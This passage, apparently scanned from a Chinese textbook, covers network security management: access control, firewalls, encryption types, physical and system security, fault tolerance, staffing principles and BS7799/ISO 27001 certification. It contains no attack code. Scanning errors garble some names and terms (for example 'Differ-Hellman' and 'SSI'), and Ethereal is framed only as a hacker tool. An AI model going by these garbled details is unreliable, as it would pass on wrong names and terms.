制 台 可 以 装载 和 卸载 模块 ， 可 以 安装 和 删除 软件 。 网 络 服务 器 的 安全 控制 包括 可 以 设置 口 
令 锁 定 服务 器 控制 台 ， 以 防止 非法 用 户 修改 、 删 除 重要 信息 或 破坏 数据 ;可 以 设 定 服务 器 
登录 时 间 限 制 、 非 法 访问 者 检测 和 关闭 的 时 间 间 隔 。 

(6) 网 络 监测 和 锁定 控制 :网 络 管理 员 应 对 网 络 实施 监控 ， 服 务 器 应 记录 用 户 对 网 络 
资源 的 访问 ， 对 非法 的 网 络 访问 ， 服 务 器 应 以 图 形 、 文 字 或 声音 等 形式 报警 ， 以 引起 网 络 
管理 员 的 注意 。 如 果 不 法 之 徒 试图 进入 网 络 ， 网 络 服务 器 应 会 自动 记录 企图 尝试 进入 网 络 
的 次 数 ， 如 果 非 法 访问 的 次 数 达 到 设 定数 值 ， 那 么 该 账户 将 被 自动 锁定 。 

(7) 网 络 端口 和 节点 的 安全 控制 : 网 络 中 服务 器 的 端口 往往 使 用 自动 回 呼 设备 、 静 默 
调制 解 调 器 加 以 保护 ， 并 以 加 密 的 形式 来 识别 节点 的 身份 。 自 动 回 呼 设备 用 于 防止 假冒 合 
法 用 户 ， 静 默 调制 解 调 器 用 以 防范 黑客 的 自动 拨号 程序 对 计算 机 进行 攻击 。 网 络 还 常 对 服 
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务 器 端 和 用 户 端 采取 安全 控制 ， 用 户 必须 携带 证 实 身份 的 验证 器 (如 智能 卡 、 磁 卡 、 安 全 密 
码 发 生 器 )。 在 对 用 户 的 身份 进行 验证 之 后 ， 才 允许 用 户 进入 用 户 端 。 然 后 ， 用 户 端 和 服务 
器 端 再 进行 相互 验证 。 

(8) 防火 墙 控制 : 防火 墙 是 一 种 保护 计算 机 网 络 安全 的 技术 性 措施 ， 它 是 一 个 用 以 阻 
止 网 络 中 的 黑客 访问 某 个 机 构 网 络 的 屏障 ， 也 可 称 之 为 控制 进 /出 方向 通信 的 门槛 。 在 网 络 
边界 上 通过 建立 起 来 的 相应 网 络 通信 监控 系统 来 隔离 内 部 和 外 部 网 络 ， 可 以 阻止 外 部 网 络 
的 侵入 。 

3. 信息 加 密 策略 


信息 加 密 的 目的 是 保护 网 内 的 数据 、 文 件 、 口 令 和 控制 信息 ， 保 护 网 络 会 话 的 完整 性 。 

网 络 加 密 可 以 在 链 路 级 、 网 络 级 、 应 用 级 等 进行 ， 分 别 对 应 网 络 体 系 结构 中 的 不 同 层 
次 形成 加 密 通信 通道 。 用 户 可 以 根据 不 同 的 需要 ， 选 择 适 当 的 加 密 方 式 。 

加 密 过 程 由 加 密 算法 来 具体 实施 。 据 不 完全 统计 ， 到 目前 为 止 ， 已 经 公开 发 表 的 各 种 
加 密 算法 多 达 数 百 种 。 如 果 按 照 收发 双方 使 用 的 密 钥 是 否 相同 来 分 类 ， 可 以 将 这 些 加 密 算 
法 分 为 对 称 密码 算法 和 非 对 称 密码 算法 。 

(1) 在 对 称 密码 算法 中 ， 加 密 和 解密 使 用 相同 的 密 钥 。 比 较 著 名 的 对 称 密码 算法 有 美 
国 的 DES 及 其 各 种 变形 ， 欧 洲 的 IDEA、RC4、RC5， 以 及 以 代 换 密码 和 转 轮 密码 为 代表 
的 古典 密码 等 。 对 称 密码 算法 的 优点 是 有 很 强 的 保密 强度 ， 且 经 得 住 时 间 的 检验 和 攻击 ， 
但 其 密 钥 必须 通过 安全 的 途径 传送 。 因 此 ， 其 密 钥 管 理 成 为 系统 安全 的 重要 因素 。 

(2) 在 非 对 称 密码 算法 中 ， 加 密 和 解密 使 用 的 密 钥 互 不 相同 ， 而 且 很 难 从 加 密 密 钥 推 
导出 解密 密 钥 。 比 较 著 名 的 非 对 称 密码 算法 有 RSA、Differ-Hellman、LUC、Rabin 等 ， 其 
中 最 有 影响 的 公 钥 密码 算法 是 RSA。 公 钥 密 码 的 优点 是 可 以 适应 网 络 的 开放 性 要 求 ， 且 密 
钥 管 理 也 较为 简单 ， 可 方便 地 实现 数字 签名 和 验证 。 但 其 算法 复杂 ， 加 密 数 据 的 速率 较 低 。 

针对 两 种 密码 体系 的 特点 ， 一 般 的 实际 应 用 系统 中 都 采用 两 类 密码 算法 进行 组 合 应 
用 ， 对 称 算法 加 密 长 消息 ， 非 对 称 算法 加 密 短 消息 。 比 如 用 对 称 算 法 来 加 密 数据 ， 用 非 对 
称 算 法 来 加 密 对 称 算法 所 使 用 的 密 钥 ， 这 样 既 解 决 了 对 称 算法 密 钥 管 理 的 问题 ， 又 解决 了 
非 对 称 算法 加 密 速度 的 问题 。 现 在 流行 的 PGP 和 SSI 等 加 密 技 术 就 是 将 对 称 密码 算法 和 非 
对 称 密码 算法 结合 在 一 起 。 


9.4 建立 网 络 安全 体系 


建立 网 络 安全 体系 指 通过 对 网 络 的 全 面 了 解 ， 按 照 安 全 策略 的 要 求 、 风 险 分 析 的 结果 
及 整个 网 络 的 安全 目标 ， 设 计 和 建立 整个 网 络 的 安全 体系 。 具 体 的 安全 控制 系统 由 以 下 几 
个 方面 组 成 : 物理 安全 、 网 络 安全 、 系 统 安全 、 信 息 安全 、 应 用 安全 。 


9.4.1 物理 安全 


保证 计算 机 系统 各 种 设备 的 物理 安全 是 整个 计算 机 系统 安全 的 前 提 ， 物 理 安全 是 保护 
计算 机 网 络 设备 、 设 施 等 免 草 地震、 水 灾 、 火 灾 ， 以 及 避免 人 为 操作 失误 或 错误 各 种 计算 
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机 犯罪 行为 导致 破坏 的 过 程 ， 它 主要 包括 3 个 方面 。 


(1) 环境 安全 : 对 系统 所 在 环境 的 安全 保护 ， 如 区 域 保护 和 灾难 保护 ， 对 此 国家 有 专 
门 的 安全 标准 ， 如 GB50173 一 93《 电 子 计算 机 机 房 设 计 规范 》、 国 标 GB2887 一 89《 计 算 
站 场地 技术 条 件 》、GB9361 一 88《 计 算 站 场地 安全 要 求 》。 

(2) 设备 安全 : 主要 包括 设备 的 防盗 、 防 毁 、 防 电磁 信息 辐射 泄漏 、 防 止 线路 截获 、 
抗 电磁 干扰 及 电源 保护 等 。 

(3) 传输 介质 的 安全 : 包括 介质 数据 的 安全 及 介质 本 身 的 安全 。 


9.4.2 网络 安全 


在 网 络 的 安全 方面 ， 主 要 考虑 优化 网 络 及 整个 网 络 系统 的 安全 。 
1. 优化 网 络 


安全 系统 是 建立 在 网 络 系统 之 上 的 ， 网 络 结构 的 安全 是 安全 系统 成 功 建立 的 基础 。 在 
整个 网 络 结构 的 安全 方面 ， 主 要 考虑 网 络 结构 、 系 统 和 路 由 的 优化 。 


2. 网 络 系统 安全 


(1) 访问 控制 及 内 外 网 的 隔离 。 访 问 控制 可 以 通过 如 下 几 个 方面 来 实现 ; 制定 严格 的 
管理 制度 ， 如 用 户 授权 实施 细则 、 口 令 字 及 账户 管理 规范 、 权 限 管理 制度 ;配备 相应 的 安 
全 设备 ， 如 在 内 部 网 与 外 部 网 之 间 设 置 防火 墙 以 实现 内 外 网 的 隔离 与 访问 控制 。 

(2) 内 部 网 不 同 网 络 安全 域 的 隔离 及 访问 控制 。 可 以 利用 VLAN(Virtual LAN) 技 术 来 
实现 对 内 部 子 网 的 物理 隔离 。 通 过 在 交换 机 上 划分 VLAN， 可 以 将 整个 网 络 划分 为 几 个 不 
同 的 广播 域 ， 实 现 内 部 不 同 网 段 的 物理 隔离 。 

(3) 网 络 安全 检测 。 网 络 系统 的 安全 性 取决 于 网 络 系统 中 最 薄弱 的 环节 。 及 时 发 现 网 
络 系统 中 最 薄弱 的 环节 并 最 大 限度 地 保证 网 络 系统 的 安全 ， 其 最 有 效 的 方法 是 定期 对 网 络 
系统 进行 安全 分 析 ， 及 时 发 现 并 修正 存在 的 弱点 和 漏洞 。 

(4) 审计 。 审 计 是 记录 用 户 使 用 计算 机 网 络 系统 进行 所 有 活动 的 过 程 ， 是 提高 安全 性 
的 重要 工具 。 它 不 仅 能 够 识别 谁 访 问 了 系统 ， 还 能 看 出 系统 正 被 怎样 使 用 。 

(5) 网 络 防 病毒 。 由 于 在 网 络 环境 下 ， 计 算 机 病毒 有 不 可 估量 的 威胁 性 和 破坏 力 ， 因 
此 ， 计 算 机 病毒 的 防范 是 网 络 安全 建设 中 重要 的 一 环 。 网 络 防 病毒 方面 ， 应 建立 全 网 统一 
的 防 病毒 体系 ， 支 持 对 网 络 、 服 务 器 和 工作 站 的 实时 病毒 监控 ;能够 在 中 心 控制 台 向 多 个 
目标 分 发 新 版 杀毒 软件 ， 并 监视 多 个 目标 的 病毒 防治 情况 。 

(6) 网 络 备份 系统 。 使 用 备份 系统 恢复 运行 计算 机 系统 所 需 的 数据 和 系统 信息 。 备 份 
不 仅 在 网 络 系统 硬件 故障 或 人 为 失误 时 起 到 保护 作用 ， 也 在 入 侵 者 非 授权 访问 或 对 网 络 攻 
击 及 破坏 数据 完整 性 时 起 到 保护 作用 ， 同 时 也 是 系统 灾难 恢复 的 前 提 之 一 。 备 份 包括 全 盘 
备份 、 增 量 备 份 、 差 别 备 份 、 按 需 备 份 。 

(7) 系统 容错 。 性 能 、 价 格 、 可 靠 性 是 评价 一 个 网 络 系统 的 3 个 要 素 。 为 了 提高 可 靠 
性 ， 人 们 总 结 了 两 种 方法 : 一 种 是 避 错 ， 即 试图 建造 一 个 不 包含 “故障 ”的 系统 ， 要 绝对 
做 到 这 一 点 ， 实 际 上 是 不 可 能 的 。 第 二 种 方法 叫 容错 ， 是 指 当 系 统 出 现 某 些 硬件 或 软件 错 
误 时， 系统 仍 能 执行 规定 的 一 组 程序 ， 或 者 程序 不 会 因 系统 中 的 故障 而 中 断 或 被 修改 ， 并 
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且 执行 结果 也 不 包含 系统 中 故障 所 引起 的 差错 。 

容错 系统 的 几 种 常用 实现 方法 如 下 : 

(1) 空闲 设备 : 在 系统 中 配置 一 个 处 于 空闲 状态 的 备用 部 件 ， 当 原件 出 现 故障 时 ， 该 
设备 就 由 空闲 转 为 运行 ， 代 蔡 原 件 的 功能 。 

(2) 负载 平衡 : 采用 负载 平衡 这 种 容错 方法 的 系统 使 用 两 个 部 件 共同 承担 一 项 任务 ， 
如 果 其 中 的 一 个 出 现 故障 ， 另 一 个 则 担负 起 原来 两 个 部 件 的 任务 。 

(3) 镜像 : 由 两 个 部 件 执行 完全 相同 的 工作 ， 如 果 其 中 一 个 出 现 故障 ， 另 一 个 系统 继 
续 工 作 。 

(4) 存储 元 余 : 存储 子 系统 是 网 络 系统 中 最 易 发 生 故 障 的 部 分 。 通 过 磁盘 镜像 、 磁 盘 
双 联 以 及 RAID( 宛 余 磁 盘 阵 列 ) 等 技术 ， 可 以 提高 存储 系统 的 容错 性 能 。 

(5) 网 络 元 余 : 是 指 网 络 系统 中 的 物理 线路 及 设备 的 元 余 ， 以 维持 物理 网 络 的 持续 正 
常 运行 。 网 状 的 主干 网 拓扑 结构 、 双 核心 交换 机 、 宛 余 配 线 连接 等 ， 都 可 以 保证 网 络 中 没 
有 单 点 故障 。 


9.4.3 系统、 信息 和 应 用 安全 


系统 的 安全 主要 是 指 操作 系统 、 应 用 系统 的 安全 性 以 及 网 络 硬件 平台 的 可 靠 性 。 对 于 
操作 系统 的 安全 防范 ,可 以 采取 如 下 策略 : 对 操作 系统 进行 安全 配置 ， 提 高 系统 的 安全 性 ; 
系统 内 部 调用 不 对 Intemet 公开 : 尽 可 能 采用 安全 性 高 的 操作 系统 ， 应 用 系统 在 开发 时 ， 
采用 规范 化 的 开发 过 程 ， 尽 可 能 地 减少 应 用 系统 的 漏洞 ， 网 络 上 的 服务 器 和 网 络 设备 尽 可 
能 不 采取 同一 家 的 产品 ， 通 过 专业 的 安全 工具 (安全 检测 系统 ) 定 期 对 网 络 进 行 安全 评估 。 

信息 安全 包括 信息 存储 的 安全 及 传输 的 安全 。 存 储 的 安全 可 通过 访问 控制 、 数 据 备 份 
等 措施 来 保障 。 对 于 传输 的 安全 性 ， 可 以 通过 加 密 及 签名 机 制 来 保障 。 

在 应 用 安全 上 ， 主 要 考虑 访问 的 授权 、 传 输 的 加 密 和 审计 记录 。 首 先 ， 必 须 加 强 登 录 
过 程 的 认证 ， 确 保 用 户 的 合法 性 ， 其 次 ， 应 该 严格 限制 登录 者 的 操作 权限 ， 将 其 完成 的 操 
作 限制 在 最 小 的 范围 内 。 另 外 ， 在 加 强 主机 的 管理 上 ， 除 了 访问 控制 和 系统 漏洞 检测 外 ， 
还 可 以 采用 访问 存 取 控制 ， 对 权限 进行 分 割 和 管理 。 应 用 安全 平台 要 加 强 资源 目录 管理 和 
授权 管理 、 传 输 加 密 、 审 计 记录 和 安全 管理 。 


9.5 ”安全 管理 实施 


为 了 保护 网 络 的 安全 性 ， 除 了 在 网 络 设计 上 增加 安全 服务 功能 、 完 善 系统 的 安全 保密 
措施 外 ， 安 全 管理 规范 也 是 网 络 安全 所 必需 的 。 安 全 管理 策略 一 方面 从 纯粹 的 管理 上 即 安 
全 管理 规范 来 实现 ， 另 一 方面 从 技术 上 建立 高 效 的 管理 平台 (包括 网 络 管理 和 安全 管理 )。 
安全 管理 策略 主要 有 : 定义 完善 的 安全 管理 模型 ， 建 立 长 远 的 并 且 可 实施 的 安全 策略 ， 彻 
底 贯彻 规范 的 安全 防范 措施 ， 建 立 恰当 的 安全 评估 尺度 ， 并 且 进 行经 常 性 的 规则 审核 。 当 
然 ， 还 需要 建立 高 效 的 管理 平台 。 
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9.5.1 安全 管理 原则 


网 络 信息 系统 的 安全 管理 主要 基于 3 个 原则 。 

(1) 专人 负责 原则 。 每 一 项 与 安全 有 关 的 活动 ， 都 必须 有 两 人 或 多 人 在 场 。 这 些 人 应 
是 系统 主管 领导 指派 的 ， 他 们 忠诚 可 靠 ， 能 胜任 此 项 工作 ;他 们 应 该 签署 工作 情况 记录 以 
证 明 安全 工作 已 得 到 保障 。 与 安全 有 关 的 活动 有 : 访问 控制 使 用 证 件 的 发 放 与 回收 ; 信息 
处 理 系 统 使 用 的 媒介 发 放 与 回收 ; 保密 信息 的 处 理 ;硬件 和 软件 的 维护 ;系统 软件 的 设 
计 、 实 现 和 修改 ; 重要 程序 和 数据 的 删除 与 销毁 等 。 

(2) 任期 有 限 原则 。 一 般 地 讲 ， 最 好 不 要 让 任何 人 长 期 担任 与 安全 有 关 的 职务 ， 以 免 
使 他 认为 这 个 职务 是 专 有 的 或 永久 性 的 。 为 遵循 任期 有 限 原则 ， 工 作 人 员 应 不 定期 地 循环 
任职 ， 强 制 实行 休假 制度 ， 并 规定 对 工作 人 员 进 行 轮流 培训 ， 以 使 任期 有 限制 度 切实 
可 行 。 

(3) 职责 分 离 原则 。 在 信息 处 理 系统 工作 的 人 员 不 要 打听 、 了 解 或 参与 职责 以 外 的 任 
何 与 安全 有 关 的 事情 ， 除 非 系统 主管 领导 批准 。 出 于 对 安全 的 考虑 ， 下 面 每 组 内 的 两 项 信 
息 处 理工 作 应 当 分 开 : 计算 机 操作 与 计算 机 编程 ， 机 密 资 料 的 接收 与 传送 ， 安 全 管理 与 系 
统管 理 ， 应 用 程序 与 系统 程序 的 编制 ， 访 问 证 件 的 管理 与 其 他 工作 ; 计算 机 操作 与 信息 处 
理 系 统 使 用 媒介 的 保管 等 。 


9.5.2 ”安全 管理 的 实现 





信息 安全 系统 的 安全 管理 部 门 应 根据 管理 原则 和 该 系统 处 理 数据 的 保密 性 ， 制 定 相 应 
的 管理 制度 ， 具 体 工 作 如 下 。 

(1) 根据 工作 的 重要 程度 ， 确 定 该 系统 的 安全 等 级 。 

(2) 根据 确定 的 安全 等 级 ， 确 定安 全 管理 的 范围 。 

(3) 制定 相应 的 机 房 出 入 管理 制度 。 

(4) 制定 严格 的 操作 规程 。 

(5) 制定 完备 的 系统 维护 制度 。 

(6) 制定 应 急 措 施 。 

对 于 安全 等 级 要 求 较 高 的 系统 ， 要 实行 分 区 控制 ， 限 制 工 作 人 员 出 入 与 己 无 关 的 区 
域 。 出 入 管理 可 采用 证 件 识 别 或 安装 自动 识别 登记 系统 ， 采 用 磁卡 、 身 份 卡 等 手段 ， 对 人 
员 进 行 识 别 、 登 记 管理 。 要 根据 职责 分 离 和 多 人 负责 的 原则 ， 各 负 其 责 ， 不 能 超越 自己 的 
管辖 范围 。 对 系统 进行 维护 时 ， 应 采取 数据 保护 措施 ， 如 数据 备份 等 。 维 护 时 要 首先 经 主 
管 部 门 批准 ， 并 有 安全 管理 人 员 在 场 ， 故 障 的 原因 、 维 护 内 容 和 维护 前 后 的 情况 要 详细 记 
录 。 要 制定 系统 在 紧急 情况 下 如 何 尽快 恢复 的 应 急 措施 ， 使 损失 减 至 最 小 。 建 立 人 员 雇 用 
和 解聘 制度 ， 对 工作 调动 和 离职 人 员 要 及 时 调整 相应 的 授权 。 
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9.6 ”安全 性 测试 及 评估 
9.6.1 网 络 安全 测试 


系统 安全 问题 的 发 现 有 两 种 途径 : 一 是 实际 发 生 了 非法 操作 和 攻击 行为 ， 据 此 来 查找 
系统 的 安全 漏洞 ; 另 一 个 途径 则 是 自己 进行 系统 安全 漏洞 的 审查 。 而 后 者 在 网 络 的 安全 管 
理 中 是 一 个 非常 重要 的 手段 ， 这 种 主动 降低 网 络 安全 风险 的 做 法 意义 重大 。 

进行 网 络 安全 性 测试 可 以 采用 的 方法 有 使 用 扫描 工具 检测 系统 漏洞 、 在 网 络 中 设置 
“ 密 饶 ”。 

目前 网 络 上 黑客 工具 随处 可 见 ， 这 些 工具 针对 网 络 上 的 安全 弱点 进行 自动 扫描 分 析 或 
监听 ， 危 害 极 大 。 如 Ethereal 软件 是 互联 网 上 众多 黑客 软件 中 的 一 种 ， 其 主要 手段 是 通过 
侦 听 线路 数据 通信 ， 窃 取 和 破解 数据 信息 ， 并 从 中 筛选 、 分 析出 用 户 的 账号 或 密码 等 重要 
数据 ， 伺 机 冒充 合法 客户 进入 系统 以 达到 其 目的 。 对 此 类 的 软件 ， 需 要 有 相应 的 应 对 策略 
进行 防范 ， 如 关闭 一 切 不 必要 的 端口 ， 对 此 类 程序 经 常 利 用 的 操作 系统 或 应 用 软件 的 漏洞 
及 早 打 补丁 等 。 


9.6.2 ”网络 安 全 评估 


安全 对 象 及 安全 问题 的 复杂 性 决定 了 网 络 安全 工程 的 复杂 性 、 持 续 性 、 反 复 性 。 在 此 
过 程 中 ， 网 络 安全 评估 是 一 个 重要 的 步骤 ， 通 过 网 络 安全 评估 ， 可 以 对 企业 网 络 安全 状况 
有 一 个 整体 的 了 解 。 

评估 一 个 网 络 的 安全 情况 ， 不 仅仅 是 物理 防范 措施 等 技术 方面 的 问题 ， 还 需要 综合 考 
虑 人 员 、 环 境 等 其 他 的 非 技术 因素 。 


9.7 ”信息 安全 管理 标准 
9.7.1 国际 信息 安全 管理 标准 


随 着 在 世界 范围 内 信息 化 水 平 的 不 断 发 展 和 贸易 全 球 一 体 化 的 不 断 普及 和 深入 ， 信 息 
系统 在 政府 、 机 构 和 商业 企业 中 真正 得 到 了 广泛 应 用 。 许 多 组 织 对 其 信息 系统 不 断 增长 的 
依赖 性 ， 加 上 在 信息 系统 上 运作 业务 的 风险 、 收 益 和 机 会 ， 使 得 信息 安全 管理 成 为 组 织 管 
理 越 来 越 关键 的 一 部 分 ， 在 很 多 的 场合 ， 保 护 信 息 安 全 、 建 立信 息 安 全 管理 体系 是 政府 、 
机 构 或 企业 营运 的 重要 工作 之 一 。 

信息 安全 威胁 日 益 紧迫 ， 在 这 样 的 世界 大 环境 和 学 术 界 共同 认同 的 原则 下 ， 各 国 的 研 
究 机 构 都 纷纷 研究 和 制定 信息 安全 管理 、 风 险 评估 、 信 息 安全 技术 的 标准 ， 而 英国 标准 化 
协会 (BSD ， 是 全 球 标准 界 负 有 盛名 的 机 构 ， 在 成 功 地 颁布 了 ISO9000、ISO14000、 
OHSAS18000 等 世界 著名 的 标准 后 ， 又 率先 制定 了 信息 安全 管理 标准 BS7799。 

1995 年 5 月 ， 英 国标 准 协 会 (BSD 就 提出 了 信息 安全 管理 标准 BS7799， 并 于 1999 年 
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重新 修改 了 该 标准 。 该 标准 分 为 两 个 部 分 : BS7799-1，《 信 息 安 全 管理 实施 规则 》; 
BS7799-2，《 信 息 安全 管理 体系 规范 》。 
@ 第 一 部 分 ，BS7799-1 ， 名 为 Code of Practice for Information Security 
Management， 在 2000 年 12 月 ， 经 包括 中 国 在 内 的 ISO/TECJTC1( 国 际 标准 化 组 
织 和 国际 电工 委员 会 的 联合 技术 委员 会 ) 投 票 认可 ， 成 为 国际 上 最 具 权 威 和 最 具 代 
表 性 的 标准 ， 即 国际 标准 ISO/TEC17799《 信 息 技术 -信息 安全 管理 实施 细则 》， 
目前 其 最 新 版 本 为 2005 年 版 ， 也 就 是 常 说 的 ISO 17799:2005。 
@ 第 二 部 分 ， 名 为 for Information Security Management Specification， 其 最 新 修订 版 
在 2005 年 10 月 经 ISOTEC 采纳 ， 正 式 成 为 ISO 27001。 


1. BS7799 第 一 部 分 : ISO/IEC 17799:2005 


国际 标准 ISO 17799， 是 一 个 详细 的 安全 标准 ， 包 括 安 全 内 容 的 所 有 准则 ， 由 10 个 独 
立 的 部 分 组 成 ， 每 一 节 都 覆盖 了 不 同 的 主题 和 区 域 ， 可 以 引导 机 构 、 企 业 建立 一 个 完整 的 
信息 安全 管理 体系 。 它 以 分 析 组 织 机 构 及 企业 面临 的 安全 风险 为 起 点 ， 对 信息 安全 风险 进 
行动 态 的 、 全 面 的 、 有 效 的 、 不 断 改进 的 管理 ， 强 调 信息 安全 管理 的 目的 是 保护 组 织 机 构 
及 企业 业务 的 连续 性 不 受信 息 安 全 事件 的 破坏 ， 从 机 构 或 企业 现 有 的 资源 和 管理 基础 为 出 
发 点 ， 建 立信 息 安 全 管理 体系 (ISMS)， 使 机 构 或 企业 的 信息 安全 以 最 小 投入 满足 需求 。 

通过 层次 结构 化 形式 提供 安全 策略 、 信 息 安全 的 组 织 结构 、 资 产 管理 、 人 力 资源 安全 
标准 控制 ， 以 规范 化 组 织 机 构 信息 安全 管理 建设 的 内 容 。11 个 章节 包括 : 

@ ”安全 方针 一 一 为 信息 安全 提供 管理 指导 和 支持 。 
安全 组 织 一 在 公司 内 管理 信息 安全 。 
资产 分 类 与 管理 一 一 对 公司 的 信息 资产 采取 适当 的 保护 措施 。 
人 员 安 全 一 一 减少 人 为 错误 、 偷 窃 、 欺 诈 或 滥用 信息 及 处 理 设施 的 风险 。 
实体 和 环境 安全 一 一 防止 对 商业 场所 及 信息 未 经 授权 的 访问 、 损 坏 及 干扰 。 
通信 与 运作 管理 一 一 确保 信息 处 理 设施 正确 和 安全 运行 。 
访问 控制 一 管理 对 信息 的 访问 。 
系统 的 获得 、 开 发 和 维护 一 一 确保 将 安全 纳入 信息 系统 的 整个 生命 周期 。 
安全 事件 管理 一 一 确保 安全 事件 发 生 后 有 正确 的 处 理 流程 和 报告 方式 。 
商业 活动 连续 性 管理 一 一 防止 商业 活动 的 中 断 ， 并 保护 关键 的 业务 过 程 免 受 重大 
故障 或 灾难 的 影响 。 
@ ”符合 法 律 一 避免 违反 任何 刑法 和 民法 、 法 律 法 规 或 合同 义务 以 及 任何 安全 要 求 。 
2. BS7799 第 二 部 分 : ISO 27001 


ISO 27001 是 目前 最 完整 的 信息 安全 管理 体系 ISMS(Specification for Information 
Security Management Systems) 的 参考 规范 ， 详 细 说 明了 建立 、 实 施 和 维护 信息 安全 管理 体 
系 的 要 求 ， 可 用 来 指导 相关 人 员 应 用 ISO 17799。 它 以 计划 (Plan)、 实 施 (Do)、 检 查 
(Check)、 行 动 (Action) 的 模式 ， 将 管理 体系 规范 导入 机 构 或 企业 内 ， 以 达到 持续 改进 的 目 
的 。 其 最 终 目 标 在 于 建立 适合 企业 需要 的 信息 安全 管理 体系 。 
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9.7.2 ”如 何 实施 ISMS 


1. 建立 ISMS 

(1) 研究 采购 标准 一 一 需要 读 懂 、 读 通 。 

(2) 培训 一 一 帮助 实施 信息 安全 管理 系统 。 

(3) 组 建 队伍 制订 策略 一 一 通过 最 高 管理 层 组 织 策划 全 面 实施 体系 。 

(4) 选择 顾问 一 一 可 以 得 到 顾问 式 的 建议 ， 以 更 好 地 实施 信息 安全 管理 体系 。 

(5) 进行 风险 评估 一 一 需要 对 所 有 潜在 安全 缺陷 进行 评估 。 这 不 仅 限于 IT， 而 且 还 包 
括 组 织 中 所 有 敏感 信息 。 

(6) 制订 策略 文件 一 一 作为 管理 信息 安全 体系 权威 性 文件 。 

(7) 制订 支持 性 文件 一 一 汇集 相关 程序 来 支持 安全 策略 ， 包 括 资 产 、 人 员 安 全 、 物 理 
环境 安全 、 业 务 持续 经 营 管理 等 。 

(8) 选择 认证 机 构 一 一 认证 公司 是 第 三 方 机 构 ， 可 以 有 效 地 审核 公司 的 管理 体系 ， 如 
果 符 合 标准 ， 将 颁发 证 书 。 

(9) 实施 信息 安全 管理 体系 一 一 实施 的 关键 是 沟通 和 培训 。 在 实施 阶段 ， 所 有 执行 程 
序 的 人 员 都 要 收集 记录 以 证 明 “ 规 定 的 做 到 了 ， 做 到 的 符合 规定 ”。 

(10) 获得 认证 一 一 认证 机 构 安排 初审 。 在 此 阶段 ， 认 证 机 构 将 审核 企业 的 信息 安全 管 
理 体 系 ， 并 建议 是 否 发 证 。 

(11) 后 续 审核 一 一 旦 获得 认证 并 拿 到 证 书 ， 就 可 以 对 外 宣传 企业 已 成 功 获得 认证 。 
为 保证 认证 资格 ， 企 业 需 要 继续 实施 信息 管理 体系 。 认 证 机 构 要 定期 对 标准 执行 情况 进行 
检查 。 

2. 认证 步骤 

(1) 按照 ISO 27001(BS7799 一 2:2005) 建 立 框架 。 

(2) 评估 费用 和 正式 审核 时 间 。 

(3) 向 评估 机 构 递交 正式 申请 。 

(4) (可 选项 ) 评 估 机 构 将 进行 预审 ， 在 正式 审核 前 排除 一 些 重大 的 缺失 ， 同 时 让 客户 
熟悉 审核 的 方法 及 风险 评估 、 审 查 方针 、 范 围 和 采用 的 程序 。 检 查 体系 中 遗漏 和 需要 修改 
的 地 方 。 

(5) 评估 机 构 将 进行 第 一 阶段 审核 ， 主 要 进行 方针 、 范 围 和 采用 程序 的 审核 ， 查 看 风 
险 评估 的 结果 、 处 理 方法 和 适用 性 声明 ， 检 查 体系 中 遗漏 和 需要 修改 的 地 方 。 

(6) 评估 机 构 将 进行 第 二 阶段 审核 ， 主 要 进行 审核 ， 查 看 程序 规定 的 执行 情况 。 评 佑 
机 构 将 现场 审核 并 给 出 建议 。 

(7) 如 果 能 顺利 完成 审核 ， 在 确定 认证 范围 后 ， 发 放 信息 安全 体系 证 书 。 在 满足 持续 
审核 条 件 下 ， 证 书 3 年 有 效 。 


3. 认证 机 构 
BSI( 英 国标 准 协会 ) 是 全 球 最 早 和 最 具 权 威 的 国际 认证 机 构 ， 拥 有 超过 60 000 个 认证 
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地 点 和 100 多 个 国家 的 客户 ， 提 供 包 括 审核 、 认 证 和 培训 在 内 的 各 种 针对 管理 体系 的 专业 
性 服务 ， 如 企业 经 营 连 续 性 、 环 境 、 食 品 安全 、 健 康 和 安全 、 信 息 安全 、 整 合 管理 、 质 
量 、 社 会 责任 、 持 续 发 展 、IT 服务 管理 等 。 其 客户 包括 波音 、 惠 普 、 中 国 国际 航空 、 通 
用 汽车 、 花 旗 集 团 ， 等 等 。 

4. 认证 情况 

全 球 已 经 颁发 了 超过 1000 张 认 证 证 书 ， 证 书 主要 集中 在 日 本 、 英 国 、 印 度 、 中 国 台 
湾 ， 主 要 分 布 在 政府 、 金 融 、 通 信 、 电 子 、 物 流 等 行业 。2002 年 4 月 ， 我 国 第 一 个 制造 企 
业 生 益 科技 通过 了 挪威 船 级 社 DNV 的 审核 认证 ， 获 得 了 BS7799 英国 认证 证 书 ， 成 为 我 
国 首 家 、 全 球 百 家 之 内 的 获得 BS7799 证 书 的 制造 企业 。 其 他 通过 认证 的 国内 企业 还 有 几 
十 家 ， 如 中 芯 国 际 、 上 海 华 虹 NEC 电子 有 限 公 司 、 大 连 简 柏 特 (GENPACT) 信 息 技术 有 限 
公司 、 大 连 华 信 计算 机 技术 有 限 公 司 、GDS 万 国 数据 、 博 朗 软件 、 上 海 超级 计算 中 心 、 辽 
宁 移 动 CMNet 骨干 网 等 。 


9.7.3 ”国内 信息 安全 管理 标准 


我 国政 府 主管 部 门 以 及 各 行 各 业已 经 认识 到 了 信息 安全 的 重要 性 ， 政 府 部 门 开 始 出 台 
一 系列 相关 策略 ， 直 接 牵 引 、 推 进 信息 安全 的 应 用 和 发 展 。 由 政府 主导 的 各 大 信息 系统 工 
程 和 信息 化 程度 要 求 非常 高 的 相关 行业 ， 也 开始 出 台 对 信息 安全 技术 产品 的 应 用 标准 和 规 
范 。 国 务 院 信息 化 工作 小 组 最 近 颁 布 的 《关于 我 国电 子 政务 建设 指导 意见 》 也 强调 了 电子 
政务 建设 中 信息 系统 安全 的 重要 性 ; 中 国人 民 银 行 正在 加 紧 制 定 网 上 银行 系统 安全 性 评估 
指引 ， 并 明确 提出 对 信息 安全 的 投资 要 达到 IT 总 投资 的 10% 以 上 ; 而 在 其 他 一 些 关 键 行 
业 ， 信 息 安 全 的 投资 甚至 已 经 超过 了 总 IT 预算 的 30% 一 50%。 

2002 年 4 月 ， 我 国 成 立 了 “全 国信 息 安 全 标准 化 技术 委员 会 (TC260)”， 该 标 委 会 是 
在 信息 安全 的 专业 领域 内 ， 从 事 信 息 安全 标准 化 工作 的 技术 工作 组 织 。 信 息 安全 标 委 会 设 
置 了 10 个 工作 组 ， 其 中 信息 安全 管理 ( 含 工程 与 开发 ) 工 作 组 (WG7) 负 责 对 信息 安全 的 行 
政 、 技 术 、 人 员 等 管理 提出 规范 要 求 及 指导 指南 ， 包 括 信息 安全 管理 指南 、 信 息 安 全 管理 
